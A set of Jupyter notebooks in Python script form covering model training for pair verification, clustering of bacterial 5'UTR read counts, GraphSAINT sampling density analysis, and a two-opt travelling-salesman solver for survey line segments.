math.log(threshold): right_num += 1 total_num += 1 else: total_num += 1 if print_index == True: print(idx,predic_prob[0][scores.item()].item()) total_loss += loss.item() pbar.update() if total_num == sample_size: break encoderK1.train() encoderD1.train() return total_loss/total_num, right_num, total_num # # Start running # ### Define hyperparameters # + learning_rate = 0.0001 num_epochs = 1 batch_size = 1 hidden_size = 512 num_layers = 1 p = 0.2 plot_every = 500 
#unit: batchs print_every = 5000 # - # ### Create model instance # + encoderK1, encoderD1, plot_losses, start_from = get_encoders(new = True,model_num =1) # new = False for loading model using pickle encoderK_optimizer = optim.SGD(encoderK1.parameters(), lr=learning_rate,momentum=0.9) encoderD_optimizer = optim.SGD(encoderD1.parameters(), lr=learning_rate,momentum=0.9) criteria = nn.CrossEntropyLoss() # - # ### Load data train_loader, dataset, total_batches, vocab_size = get_or_load_data(batch_size = batch_size,from_csv_file = False,save = False,start_from=start_from) print(vocab_size) # ### Train train_model(num_epochs = 1,plot_every = 5000,print_every = 50000,save_every = 500000,start_from = start_from) # + #used for saving model when training accidently ended num = 2 with open('model'+str(num)+'.pkl', 'wb') as output: pickle.dump(encoderK1, output, pickle.HIGHEST_PROTOCOL) pickle.dump(encoderD1, output, pickle.HIGHEST_PROTOCOL) pickle.dump(plot_losses, output, pickle.HIGHEST_PROTOCOL) pickle.dump(batch_count+start_from, output, pickle.HIGHEST_PROTOCOL) print("Saved model"+str(num)+".\nBatch count: ",batch_count+start_from) # - showPlot(plot_losses) # ### Evaluate test_loader, test_dataset, test_total_batches, _ = get_or_load_data(batch_size = 1,from_csv_file = True,save = False,csv_file = "test.csv",vocab = dataset.vocab) avg_loss, right_num, total_num = evaluate(test_loader,encoderK1,encoderD1,threshold = 0.5,sample_size = 5000,print_index=True) print("right: ",right_num," out of: ",total_num," Accuracy: ",right_num/total_num) print("avg loss: ",avg_loss) print("Done!")
model_verify_pair.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + jupyter={"outputs_hidden": false} # %matplotlib inline # + jupyter={"outputs_hidden": false} import pandas as pd import numpy as np import os from plotnine import * # - # ## Overview # * select 5'UTRs longer than 80 nt # * count reads aligned to these UTRs (pysam) # * plot utr reads -bcm vs utr reads + bcm # * select UTRs with increased number of reads upon addition of BCM (clustering?) # * compare selected UTRs with genes upregulated in the stationary phase as discovered by DESeq2 # * compare selected UTRs with small RNA binding sites (pybedtools?) # ### Sample table and barcodes # + jupyter={"outputs_hidden": false} # Sample titles with corresponding barcodes samples = { 's9': ['ATCACG', 'ACAGTG'], 's9+bcm': ['CGATGT', 'GCCAAT'], 's17': ['TTAGGC', 'GATCAG'], 's17+bcm': ['TGACCA', 'TAGCTT'], 's19': ['CAGATC','GGCTAC'], 's19+bcm': ['ACTTGA', 'CTTGTA'] } # Barcodes barcodes = ['ATCACG', 'ACAGTG', 'CGATGT', 'GCCAAT', 'TTAGGC', 'GATCAG', 'TGACCA', 'TAGCTT', 'CAGATC','GGCTAC', 'ACTTGA', 'CTTGTA'] # - # ### Load counts for genes, calculate counts in UTRs longer than 80 nt # # Gene counts were obtained using `htseq` program against the standard NC_000913 .GFF file The was I calculate reads in UTRs here is not strand-specific. So the numbers can be confounded if there is a transcript going in the opposite direction. We can solve this later if needed. # + jupyter={"outputs_hidden": false} dfm = pd.read_csv('../../data/dfm.csv', sep='\t') dfm # - # ### Normalize counts for feature length, log-transform, and take means for replicates # # Pseudo-counts (+1) are added during UTR reads counting to make sure we can log-transform the data. 
# + jupyter={"outputs_hidden": false}
id_vars = ['TSS','TU_name','coord_5','coord_3','gene', 'UTR_length']
value_vars = ['s9','s17','s19','s9+bcm','s17+bcm','s19+bcm']

dfn = dfm.copy()


# Normalize counts by gene and utr length
def norm_orf(barcode, rec):
    """Read count for `barcode` normalized by the ORF length of row `rec`."""
    return float(rec[barcode] / abs(rec['first_gene_5'] - rec['first_gene_3']))


def norm_utr(barcode, rec):
    """UTR read count for `barcode` normalized by the UTR length of row `rec`."""
    return float(rec['utr_{0}'.format(barcode)] / rec['UTR_length'])


for barcode in barcodes:
    dfn['orf_{0}'.format(barcode)] = dfn.apply(lambda rec: norm_orf(barcode, rec), axis=1)
    dfn['utr_{0}'.format(barcode)] = dfn.apply(lambda rec: norm_utr(barcode, rec), axis=1)

df = dfn[id_vars].copy()

# Take means across replicates according to the samples dict, then log10.
for sample, bcs in samples.items():
    df['orf_{0}'.format(sample)] = np.log10(dfn[['orf_{0}'.format(b) for b in list(bcs)]].mean(axis=1))
    df['utr_{0}'.format(sample)] = np.log10(dfn[['utr_{0}'.format(b) for b in list(bcs)]].mean(axis=1))

df
# -

# ### Plot wild type with vs without BCM
#
# Two clusters are apparent. We are after the UTRs that are upregulated by the addition of BCM (cloud of points in the left part of the plot along y=0 line and in general (significantly) above y=x line).
#
# BTW, the point size is the length of UTR. No (apparent) correlation here.

# + jupyter={"outputs_hidden": false}
(ggplot(df, aes(x='utr_s9', y='utr_s9+bcm', size='UTR_length'))
 + geom_point(size=0.5, alpha=0.1)
 + geom_abline(slope=1, intercept=0, size=.5, color='#586e75')
)

# + jupyter={"outputs_hidden": false}
(ggplot(df, aes(x='utr_s9', y='utr_s19', size='UTR_length'))
 + geom_point(size=0.5, alpha=0.1)
 + geom_abline(slope=1, intercept=0, size=0.5, color='#586e75')
)
# -

# ### Clustering
#
# Now we need a way to split the points the way we want. Let's try a bunch of clustering algorithms from `scikit-learn.`

# + jupyter={"outputs_hidden": false}
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import euclidean_distances
from sklearn.neighbors import kneighbors_graph
from sklearn import cluster
from sklearn import mixture

# Standardize the two features used for clustering.
X = df[['utr_s9', 'utr_s9+bcm']].to_numpy()
X = StandardScaler().fit_transform(X)

bandwidth = cluster.estimate_bandwidth(X, quantile=0.3)
connectivity = kneighbors_graph(X, n_neighbors=20)
connectivity = 0.05 * (connectivity + connectivity.T)
#distances = euclidean_distances(X)

gmm = mixture.GaussianMixture(n_components=2, covariance_type='full')
ms = cluster.MeanShift(bandwidth=bandwidth, bin_seeding=True)
two_means = cluster.MiniBatchKMeans(n_clusters=2, batch_size=200)
kmeans = cluster.KMeans(n_clusters=2)
ward = cluster.AgglomerativeClustering(n_clusters=2, linkage='ward',
                                       connectivity=connectivity)
spectral = cluster.SpectralClustering(n_clusters=2, n_neighbors=20,
                                      eigen_solver='arpack',
                                      affinity='nearest_neighbors')
dbscan = cluster.DBSCAN(eps=.5)
affinity_propagation = cluster.AffinityPropagation(damping=.95, preference=-200)
average_linkage = cluster.AgglomerativeClustering(linkage='average',
                                                 affinity='cityblock',
                                                 n_clusters=2,
                                                 connectivity=connectivity)

# Fit each algorithm, label the points, and plot the resulting split.
for name, alg in [
        ('MiniBatchKMeans', two_means),
        ('KMeans', kmeans),
        ('AffinityPropagation', affinity_propagation),
        ('MeanShift', ms),
        ('GMM', gmm),
        ('SpectralClustering', spectral),
        ('Ward', ward),
        ('AgglomerativeClustering', average_linkage),
        ('DBSCAN', dbscan)
]:
    alg.fit(X)
    # Some estimators expose labels_ after fit; others need predict().
    if hasattr(alg, 'labels_'):
        df['label'] = alg.labels_.astype(np.int32)
    else:
        df['label'] = alg.predict(X)
    df['label'] = df['label'].astype('category')
    p = ggplot(df, aes(x='utr_s9', y='utr_s9+bcm', color='label')) \
        + geom_point(size=0.5, alpha=0.5) \
        + ggtitle(name) \
        + geom_abline(slope=1, intercept=0, size=0.5, color='#586e75')
    print(p)
# -

# BUG FIX: the original ended with a dangling `X = df.as_matrix` — it bound the
# method without calling it, and DataFrame.as_matrix was removed in pandas 1.0
# (use .to_numpy(), as done above). The dead statement has been removed.
sessions/examples/02 - Python machine learning - clustering.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python (pytorch geometric) # language: python # name: pygeo # --- # # GraphSAINT Analysis # + from imports import * from linkpred import * from dataset import * import matplotlib.pyplot as plt import matplotlib import matplotlib.style as style style.use('seaborn-paper') # %matplotlib inline fontsize = 12 plt.rcParams.update({ 'font.size': fontsize, 'axes.labelsize': fontsize, 'legend.fontsize': fontsize, 'xtick.labelsize': fontsize, 'ytick.labelsize': fontsize, 'axes.titlesize': fontsize }) # - ## set random seeds random.seed(123) np.random.seed(123) torch.manual_seed(123) print(torch.__version__) device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') print('device =', device) # ## Load the Dataset node_attributes = pd.read_csv('data/NDSSL data/raw/node_attributes.csv') node_attributes.head(5) # + plist = np.linspace(0.5, 0.4, 20) density = [] edge_ratio = [] walk_length = 30 batch_size = 1000 num_steps = 10 sample_coverage = 20 for i in range(len(plist)): p = plist[i] print('fraction of data in training set: %.2f' %(1.0 - 2*p)) dataset = load_dataset(dataset_name='NDSSL') data = dataset[0] data = train_test_split_big(data, val_ratio=p, test_ratio=p) data_columns = ['age', 'gender', 'worker', 'relationship', 'household_income', 'household_size', 'zipcode', 'household_vehicles', 'household_workers'] data.x = dataframe2onehot(node_attributes[data_columns], node_attributes) train_data = Data(x=data.x, edge_index=data.train_pos_edge_index, y=data.y) row, col = train_data.edge_index train_data.edge_attr = 1. / degree(col, train_data.num_nodes)[col] # Norm by in-degree. 
train_loader = GraphSAINTRandomWalkSampler(train_data, batch_size=batch_size, walk_length=walk_length, num_steps=num_steps, sample_coverage=sample_coverage, save_dir=None) density_tmp = [] edge_ratio_tmp = [] for batch in train_loader: n = batch.x.shape[0] m = batch.edge_index.shape[1] density_tmp.append((2*m/(n*(n-1)))) edge_ratio_tmp.append((m/n)) density.append(density_tmp) edge_ratio_tmp.append(edge_ratio_tmp) # - # + fig, ax = plt.subplots(1, 2, figsize=(12, 6)) ax[0].hist(density_train, label='train') ax[0].hist(density_test, label='test') ax[0].legend() ax[1].hist(edge_ratio_train, label='train') ax[1].hist(edge_ratio_test, label='test') ax[1].legend() plt.show()
GraphSAINT Analysis.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + # %matplotlib notebook import numpy as np import matplotlib.pyplot as plt from task_manager_utilities.tsp import two_opt_lines # - # # A TSP Solution for Line Segments # # The problem I'm hoping to solve here is how to most efficiently cover N, 2-point survey lines with a single vessel, and possibly, as a follow-o,n how to most efficiently cover N 2-point survey lines with N vessels. Each line can be traversed in either direction and of course each line is to only be traveresed once. # # It seems likely this problem has already been solved but it is an interestiing one with some fundimental differences from the typical traveling-salesman problems that make it fun to explore and see if we can come up with our own solution to the problem. # # Lets start with the inputs and outputs to the problem. The inputs consist of a starting point, and list of pairs of points for each line, and an ending point. Note however that no direction need be implied for the direction each line is to be traversed. # # The outputs to the problem consist of a route indicating, from the starting point, the sequence of lines and the direction they should be traversed, to minimize the distance traveled. 
# + # Starting point xs = np.array([0.])[np.newaxis] ys = np.array([4.5])[np.newaxis] # Coordinates for N lines Nlines = 2 x1s = np.arange(Nlines)[np.newaxis].T y1s = np.zeros((Nlines,1)) x2s = np.arange(Nlines)[np.newaxis].T y2s = np.ones((Nlines,1)) # Ending point xe = np.array([4.0])[np.newaxis] ye = np.array([4.0])[np.newaxis] x = np.concatenate((xs,x1s,x2s,xe),axis=0) y = np.concatenate((ys,y1s,y2s,ye),axis=0) def plot_lines(x,y): ''' A method to plot individual lines with start/end points.''' for i in np.arange(1,len(x)-1,2): plt.plot(x[i:i+2],y[i:i+2],linewidth = 3) plt.plot(x,y,'.') plt.plot(x[-1],y[-1],'dr') plt.plot(x[0],y[0],'dg') plt.grid('True') # zip joins x and y coordinates in pairs z = 0 for x1,y1 in zip(x,y): label = "{:d}".format(z) z = z +1 plt.annotate(label, # this is the text (x1,y1), # this is the point to label textcoords="offset points", # how to position the text xytext=(0,10), # distance from text to points (x,y) ha='left') # horizontal alignment can be left, right or center plt.show() plt.figure() plot_lines(x,y) # - # In the code above we created the starting point (green diamond), pairs of points for 4 lines, and and ending point (red diamond). We've concatinated these points into two arrays, x and y, and we can pre-calculate the distances between all pairs of points. This will allow us to lookup and sum "steps" along our route, where a step consists of traversing a line segment and then proceeding to the start of the next. xx, yy = np.meshgrid(x,y) d = np.sqrt( (xx-xx.T)**2 + (yy-yy.T)**2) # This matrix, `d` will prove very useful. The distance from the `i`th point to the `j`th point can be found by indexing into `d` like this: `d[i,j]`. # # Next we need a method that, given a route, calculates the distance along that route. The route we will specify by an array of integers indicating where in the array of points we've created we are to to proceed to next. 
#
# Omitting the starting point for now, consider a move from the point at index 1, along the line formed by the points at index 1 and index 2, and then to the first point in the next line in our route. We will call these two segments — the length of the line to follow, plus the distance from the end of one line to the beginning of the next — a "step".
#
# To begin let's create an array of indices for all the points in our list. We will use this array to select points we need to consider for each step.

r = np.arange(len(x))


# Now let's create a method that, when given the index of the point at which to start, will calculate the distance of a single step. We will pass in everything required to do the calculation too.

def stepDistance(start,end,d):
    """Length of a single route "step".

    A step traverses the survey line whose near endpoint is at index
    `start` (an odd index means forward along the line, an even index
    means backward), then transits from the far end of that line to the
    point at index `end`. `d` is the precomputed point-to-point distance
    matrix, so the step length is d[start, far] + d[far, end].
    """
    # The far end of the current line is the adjacent point: one index up
    # for a forward traversal, one index down for a backward traversal.
    line_end = start + 1 if start % 2 == 1 else start - 1
    return d[start, line_end] + d[line_end, end]


# Next we need a method to calculate the entire distance given a route. But first we need to think about what a route means given this setup. If we were working on the traditional TSP problem every point would be considered as part of the route. But in this case some points are the start of a line, and some points are the end of a line and sometimes the line is traversed in one direction and sometimes it is traversed in the opposite direction. So how do we handle that?
#
# What if we create a new table, that holds distances of steps, where steps may be backward or forward. We'll sort out later how to ensure a step passed in the forward direction is not redundantly also considered in the backward direction.
# # Steps in the forward direction for each line will always start on odd indices (index 0 being the starting point for the whole route), and steps in the backward direction for each line will always start on even indices. Remember that each step consists of traversal along the line, (either forward or backward), plus the distance from the end point of the current line to the begining of the next line. # # So, for example, the entry in d[1,3] will be the sum of the length of the line segment from point 1 to point 2, plus the distance from point 2 to point 3, which is the start of our next line. # # We will also include in this table the distance from the starting point of the route (at index 0) to every possible point, since the beginning or ending of any line segment could be specified as the first line to traverse. Similarly we will include the distance from every possible point to the end point of the route, since the end of any line segment could be the final segment in the route and we need the distance from it to the route end. # # + N = d.shape[0] dd = np.empty((N,N)) + np.nan fwd_start_indices = np.argwhere(np.mod(r,2) == 1) bwd_start_indices = np.argwhere(np.mod(r,2) == 0) # Indexing here can be confusing. "fwd_start_indices" should not include the final index # because that includes the end point. for idx in fwd_start_indices[:-1]: # for jdx in np.arange(N)[1:]: # Here we are calculating two things. We are calculating skip the first index and last one, because these points and # are not included in valid "steps" as we've defined them. Then we # also omit when jdx == idx, because this step starts and ends at the same # point. Finally we omit when the end point is just one more than the # start point, because our "step" requires it to be at least 2 points later. # [One point later is just as the end of the current line, but not the start of the next.] # Capture distance from any given point to the end point. 
if jdx == (N-1): dd[idx,jdx] = d[idx,jdx] # Capture the distance from any point moving along a line in a forward direction. elif jdx != N-1 and jdx != idx and jdx != (idx+1): dd[idx,jdx] = stepDistance(idx,jdx,d) # Capture the length of the line. elif jdx == (idx + 1): dd[idx,jdx] = d[idx,jdx] for idx in bwd_start_indices: for jdx in np.arange(N)[1:]: # Capture the distance from the first point to the start or end of any line. # and the distance from the end of any line to the end point. if idx == 0 or jdx == (N-1): dd[idx,jdx] = d[idx,jdx] # Capture the distance going backward along any line. elif jdx != idx and jdx != (idx-1): #if jdx != N-1 and jdx != idx and jdx != (idx-1): dd[idx,jdx] = stepDistance(idx,jdx,d) # Capture the length of each line (redundant to the forward direction) elif jdx == (idx-1): dd[idx,jdx] = d[idx,jdx] # - # Here is our table of distances for each step, and a plot of the table and the points so we can ensure this is correct. print(dd) # + plt.figure(figsize=(10,5)) plt.subplot(121) plt.imshow(dd) plt.xlabel('jdx') plt.ylabel('idx') plt.title('Distance Matrix for Connecting Lines.') plt.colorbar() plt.axis('equal') plt.axis('tight') plt.subplot(122) plot_lines(x,y) plt.show() # - # Ok, given these results, lets see if it makes any sense. Consider the step that consists of the first line going in the forward direction and ending at the seocnd line, also going in the forward direction. The index for the start of the first line is 1. The index of the start of the second line is 3. So idx = 1 and jdx = 3. The length of the first line is 1, and the distance from the end of the first line to the start of the second line in the forward direction is 1.4, so the value at idx=1, jdx=3 should be 2.4. Inspecting the distance matrix we see it is!. # # Let us check another one. Consider the step that goes from the end of the first line, backwards along the first line to the start of the second line. 
# The index corresponding to the end of the first line is 2, and the index of the start of the second line is 3. So idx = 2, and jdx = 3. The distance backward along the first line is 1 and the distance from the beginning of the first line to the beginning of the second line is 1, so the sum is 2. And indeed the box at idx=2,jdx=3 is 2.
#
# Great! Now we have a way to calculate the length of any step along the route, where a step consists of traversing a line in some direction and then transiting from the line to the beginning of the next line.
#
# Let us capture this in a function for easy use later.

def generate_distance_table_for_lines(x,y):
    '''
    Generate a distance table from a list of coordinates for a start point,
    a series of lines, and an end point.

    idx/jdx:  0    1     2     3     4    5
       x = [ xs   p1x1  p1x2  p2x1  p2x2  xe]
       y = [ ys   p1y1  p1y2  p2y1  p2y2  ye]

    Where (xs,ys) is the starting point.
    (p1x1,p1y1) -- (p1x2,p1y2) are two points that define the first line segment.
    (p2x1,p2y1) -- (p2x2,p2y2) are two points that define the second line segment.
    Additional line segments are specified in the same way.
    (xe,ye) is the ending point.

    The table is indexed by the starting point of one line, idx, and the
    starting point of a subsequent line, jdx. The table value at dd[idx,jdx]
    is the sum of the length of the line starting at idx, and the distance
    from the end of the line starting at idx to the start of the line
    specified by jdx.

    Note that when idx is odd, this implies the line is traversed in the
    forward direction, meaning that the "end" of the line is specified by the
    point at idx+1. Similarly when idx is even, this implies the line is
    traversed in the backward direction, meaning that the "end" of the line
    is specified by the point at idx-1.

    The table also provides the length of each line, which can be obtained by
    specifying indices for the points at either end. For example, dd[1,2]
    will provide the length of the first line.

    Finally, the table also holds the distance from the starting point to
    either end of every line, and similarly from the ending point to either
    end of every line. These are indexed with dd[0,i] and dd[i,N-1], where i
    is the index to/from the desired point and N is the number of points.
    '''
    # First calculate the distance between all pairs of points.
    xx, yy = np.meshgrid(x,y)
    d = np.sqrt( (xx-xx.T)**2 + (yy-yy.T)**2)
    #print(d)
    N = d.shape[0]

    # Initialize the result; NaN marks invalid transitions.
    dd = np.empty((N,N)) + np.nan

    # Get indices for steps that go in the forward direction of each line
    # (odd indices) and those that go in the backward direction (even indices).
    r = np.arange(len(x))
    fwd_start_indices = np.argwhere(np.mod(r,2) == 1)
    bwd_start_indices = np.argwhere(np.mod(r,2) == 0)
    #print(fwd_start_indices)
    #print(bwd_start_indices)

    # Indexing here can be confusing. "fwd_start_indices" should not include
    # the final index because that includes the end point.
    for idx in fwd_start_indices[:-1]: #
        for jdx in np.arange(N)[1:]: #
            # Skip the first and last indices (not valid step destinations),
            # jdx == idx (a step cannot start and end at the same point), and
            # treat jdx == idx + 1 specially (that is the end of the current
            # line, not the start of the next).

            # Capture distance from any given point to the end point.
            if jdx == (N-1):
                dd[idx,jdx] = d[idx,jdx]
            # Capture the distance from any point moving along a line in a forward direction.
            elif jdx != N-1 and jdx != idx and jdx != (idx+1):
                dd[idx,jdx] = stepDistance(idx,jdx,d)
            # Capture the length of the line.
            elif jdx == (idx + 1):
                dd[idx,jdx] = d[idx,jdx]

    for idx in bwd_start_indices:
        for jdx in np.arange(N)[1:]:
            # Capture the distance from the first point to the start or end of any line,
            # and the distance from the end of any line to the end point.
            if idx == 0 or jdx == (N-1):
                dd[idx,jdx] = d[idx,jdx]
            # Capture the distance going backward along any line.
            elif jdx != idx and jdx != (idx-1):
                #if jdx != N-1 and jdx != idx and jdx != (idx-1):
                dd[idx,jdx] = stepDistance(idx,jdx,d)
            # Capture the length of each line (redundant to the forward direction)
            elif jdx == (idx-1):
                dd[idx,jdx] = d[idx,jdx]

    return dd

# The next step is to create a function to calculate the length of an entire route. A route will be specified as a sequence of steps. When a step begins on an odd index it indicates we will traverse the line in the forward direction and when it begins on an even index it indicates we will traverse the line in the backward direction.
#
# How we generate the route requires more discussion, but for now let's generate one synthetically. Every route will start with the index of the starting point at index 0, and end with the ending point (N-1). Indices indicating the sequence of steps will fall between.

route = np.array([0, 1, 3, 2*Nlines+1])

# Calculation of the distance along the route is a little tricky and so we'll do it step-wise. We first start with the distance from the starting point to the start of the first line. Next we add the distance of each "step" where, again, a step is the length of the line plus the distance to the next line and these are added up for all full "steps" we can take. This leaves the length of the last line and the distance from whichever end of the last line we ended on to the end of the route. This is captured in `routeDistance` below using the table of distances created above.

def routeDistance(route,dd):
    '''
    Return the total length of a route using the step-distance table dd.

    route is a sequence of indices: route[0] is the start point (0),
    route[-1] is the end point (N-1), and the entries between are the
    starting points of each line in traversal order (odd = forward,
    even = backward).
    '''
    # First point to start of first line.
    dist = dd[route[0],route[1]]

    # Steps consisting of the length of each line plus transit to the next,
    # ending at the beginning of the last line.
    dist += np.sum(dd[route[1:-2],route[2:-1]])

    # For forward going lines (odd indices)
    # add the length of the last line plus the distance
    # from the end of the last line to the end point.
    if np.mod(route[-2],2) == 1:
        dist += dd[route[-2],route[-2]+1]
        dist += dd[route[-2]+1, route[-1]]
    # For backward going lines (even indices)
    # add the length of the last line plus the
    # distance to the end point.
    else:
        # BUG FIX: the column index was previously wrapped in a list
        # (dd[route[-2],[route[-2]-1]]), which made dist a 1-element ndarray
        # instead of a scalar. Index with a plain integer instead.
        dist += dd[route[-2],route[-2]-1]
        dist += dd[route[-2]-1,route[-1]]

    return dist

# Now let's check this calculation with our example route and maybe a few others. Our example route passes along each of the two lines in the forward direction. It is the route shown in the plot above. The distance from the start point to the start of the first line is 4.5. The distance along the first line is 1. The distance from the end of the first line to the start of the second is about 1.4. The distance along the second line is 1, and finally the distance from the end of the second line to the end point is about `3*1.4`. Adding these up gives the same result!

rd = routeDistance(route,dd)
print(rd)

print(4.5 + 1 + 1.4 + 1 + 3*1.4)

# Ok, now let's create another route and check that one too. This time we'll go forward along the first line, but backward along the second line.

route = np.array([0,1,4,2*Nlines+1])
print(route)

rd = routeDistance(route,dd)
print(rd)

# Checking this one, the distance from the start to the starting point is 4.5. The length of the first line is 1.0. The distance from the end of the first line to the end of the second line (since we're traversing it backward) is 1, the length of the second line is 1 and, finally, the distance from the beginning of the second line to the end point is `sqrt( (4-1)**2 + (4-0)**2)`. This gives:

print(4.5 + 1.+ 1. + 1. + np.sqrt( (4-1)**2 + (4-0)**2))

# Great! Ok so now on to how we generate routes.
#
# First we consider the properties of a valid route.
# A valid route must start with the starting point and end with the ending point, that much is clear.
#
# It is useful to remember a forward step along a line is indicated by an index in the route with an odd index while a backward step along a line is indicated by an even index.
#
# A forward step's destination cannot be the end of its own line, so a valid route cannot have two sequential indices in which the first, `i`, is odd and the second is `i + 1`. Similarly, a backward step's destination cannot be the beginning of its own line, so a valid route cannot have two sequential indices in which the first index, `i`, is even and the second is `i-1`.
#
# We also have to remember that we only want to traverse a given line once. So if we've traversed a line forward from index, `i`, we don't want to subsequently traverse the same line backward from `i+1`.
#
# As a check, one can note that the number of indices in the final route should be the number of lines, `Nlines` + 2.
#
# The strategy I will take is to first start with a random array of indices for each point in each line (that is, indices for all points omitting the start point and the end point). We'll call this array `cr` for "candidate route".

cr = np.random.permutation(np.arange(len(x)-2))+1
print(cr)

# Next I'm going to build a valid route by seeding an empty list with the first point in my candidate route, and then step through the candidate route noting which indices are invalid because of previously selected points. As mentioned above, these will be the next point in lines we are traversing in the forward direction and the previous point for lines we are traversing in the reverse direction.
#
# Finally one can assemble the final route by concatenating indices for the first point and last point to this new route.

# +
# Seed with the first candidate point and immediately invalidate its partner
# (the other end of the same line).
r = [cr[0]]
if np.mod(cr[0],2)==1:
    invalid_indices = [cr[0] + 1]
else:
    invalid_indices = [cr[0]-1]

for idx in np.arange(len(cr)):
    # Forward steps.
    if (idx != 0 and np.mod(cr[idx],2) == 1) and cr[idx] not in invalid_indices:
        r.append(cr[idx])
        # End of its own line.
        invalid_indices.append(cr[idx]+1)
    # Backward steps.
    elif (idx != 0 and idx != (len(cr)-1) and np.mod(cr[idx],2) == 0) and cr[idx] not in invalid_indices:
        r.append(cr[idx])
        # Beginning of its own line.
        invalid_indices.append(cr[idx]-1)

print(r)
print(invalid_indices)

# Prepend the start-point index (0) and append the end-point index.
route = [0] + r + [len(cr) + 1]
print("route:")
print(route)
# -

# One can plot the route and verify that it looks as one expects. To do this we generate a method to correctly index the end-points of each line in the order specified by the route, inserting the ends of lines as appropriate.

# +
def route_by_points(route):
    '''
    Generate the full route by inserting indices for the missing points for each line.

    For each odd (forward) index, the line's end point (idx+1) is inserted;
    for each even (backward) index, the line's start point (idx-1) is inserted.
    The route's first and last entries (start/end points) are passed through.
    '''
    ii = []
    for idx in route:
        ii.append(idx)
        if np.mod(idx,2) == 1 and idx != route[-1]:
            ii.append(idx+1)
        else:
            if idx != 0 and idx != route[-1]:
                ii.append(idx-1)
    return ii

ii = route_by_points(route)
print(ii)

def plot_route(ii,x,y):
    '''Plot the route through points indexed by ii; green diamond = start, red = end.'''
    plt.plot(x[ii],y[ii],':k')
    plt.plot(x[0],y[0],'dg')
    plt.plot(x[-1],y[-1],'dr')
    plt.grid('True')
    plt.show()
# -

route_pts = route_by_points(route)
plt.figure()
plot_lines(x,y)
plot_route(route_pts,x,y)

# The route validation procedure above should be condensed into a method. Let us do that now:

def generate_valid_route(cr):
    ''' Given a candidate route, return a valid route connecting lines.

    Unlike the interactive demo above, cr here is expected to contain the
    start point (0) as its first entry; the end point index appended at the
    bottom is len(cr)-1 rather than len(cr)+1 for the same reason.
    '''
    r = [cr[0]]
    # NOTE(review): the seeding of invalid_indices from cr[0] is deliberately
    # disabled (kept below as a string for reference); instead, invalidated
    # entries are filtered out of r after the loop. This changes which
    # permutations survive — the author flags this as potentially
    # controversial in the cell that uses this function.
    '''
    if np.mod(cr[0],2)==1:
        invalid_indices = [cr[0] + 1]
    else:
        invalid_indices = [cr[0]-1]
    '''
    invalid_indices = []
    for idx in np.arange(len(cr)):
        # Forward steps.
        if (idx != 0 and idx != len(cr)-1 and np.mod(cr[idx],2) == 1 and cr[idx] not in invalid_indices):
            r.append(cr[idx])
            # End of its own line.
            invalid_indices.append(cr[idx]+1)
        # Backward steps.
        elif (idx != 0 and idx != (len(cr)-1) and np.mod(cr[idx],2) == 0 and cr[idx] not in invalid_indices):
            r.append(cr[idx])
            # Beginning of its own line.
            invalid_indices.append(cr[idx]-1)

    # Drop any earlier selections that were later invalidated.
    r = [x for x in r if x not in invalid_indices]

    # Concatenate route and end point.
    route = r + [len(cr)-1]
    return route

# The next task is to modify a classic TSP algorithm, "two-opt", to find solutions for lines rather than points using our work thus far. Here is the algorithm for points from which we'll make modifications. This method is modified from a [stack-overflow](https://stackoverflow.com/questions/25585401/travelling-salesman-in-scipy) post implementing the classic two_opt algorithm.
#
# We should be mindful that the two_opt algorithm is not guaranteed to give the optimal solution, and that there are many other approximate TSP solutions in the literature.
#
# # Calculate the euclidian distance in n-space of the route r traversing cities c, ending at the path start.
# #path_distance = lambda r,c: np.sum([np.linalg.norm(c[r[p]]-c[r[p-1]]) for p in range(len(r))])
#
# # Reverse the order of all elements from element i to element k in array r.
# two_opt_swap = lambda r,i,k: np.concatenate((r[0:i],r[k:-len(r)+i-1:-1],r[k+1:len(r)]))
#
#
# def two_opt(xs,ys,improvement_threshold): # 2-opt Algorithm adapted from https://en.wikipedia.org/wiki/2-opt
#
#     #xx = [p.position.x for p in cities]
#     #yy = [p.position.y for p in cities]
#
#     xx, yy = np.meshgrid(xs,ys)
#     dd = np.sqrt( (xx-xx.T)**2 + (yy-yy.T)**2)
#
#     #print(dd)
#
#     route = np.arange(dd.shape[0]) # Make an array of row numbers corresponding to cities.
#     improvement_factor = 1 # Initialize the improvement factor.
#     #best_distance = path_distance(route,cities) # Calculate the distance of the initial path.
#     best_distance = np.sum(dd[route[:-1],route[1:]])
#
#     while improvement_factor > improvement_threshold: # If the route is still improving, keep going!
#
#         distance_to_beat = best_distance # Record the distance at the beginning of the loop.
#         for swap_first in range(1,len(route)-2): # From each city except the first and last,
#             for swap_last in range(swap_first+1,len(route)): # to each of the cities following,
#                 new_route = two_opt_swap(route,swap_first,swap_last) # try reversing the order of these cities
#                 #print(new_route)
#                 #new_distance = path_distance(new_route,cities) # and check the total distance with this modification.
#                 new_distance = np.sum(dd[new_route[:-1],new_route[1:]])
#
#                 #print("%0.3f, %0.3f" % (new_distance, best_distance))
#                 if new_distance < best_distance: # If the path distance is an improvement,
#                     route = new_route # make this the accepted best route
#                     best_distance = new_distance # and update the distance corresponding to this route.
#         improvement_factor = 1 - best_distance/distance_to_beat # Calculate how much the route has improved.
#
#         print("d:%0.3f, if: %0.3f" % (best_distance,improvement_factor))
#
#     return route # When the route is no longer improving substantially, stop searching and return the route.

# Here is the further modified two_opt function, `two_opt_lines`, to solve our line-segment TSP problem.
#
# The method first pre-calculates the table of distances for steps along the route.
#
# The route under consideration is represented in two ways - as a "route" which is a series of indices where each index represents a "step", as we've defined it above, and as a "point_route" which includes the points omitted by the step-wise representation, namely, the end points of each line-segment. The reason for these two representations will be made clear momentarily.
#
# The basic strategy of the two-opt swap algorithm is to reverse the order of a subset of the existing route, and test the distance against the best route identified thus far. By reversing the order, one effectively "unwraps" crossing portions of the route, producing a new route that is more direct. The lambda function `two_opt_swap` does this permutation.
#
# Permutations of a route must occur on the point-wise representation of the route because the step-wise representation only contains the starting points of each line. Ending points must be considered because they indicate traversal of the line in the reverse direction.
#
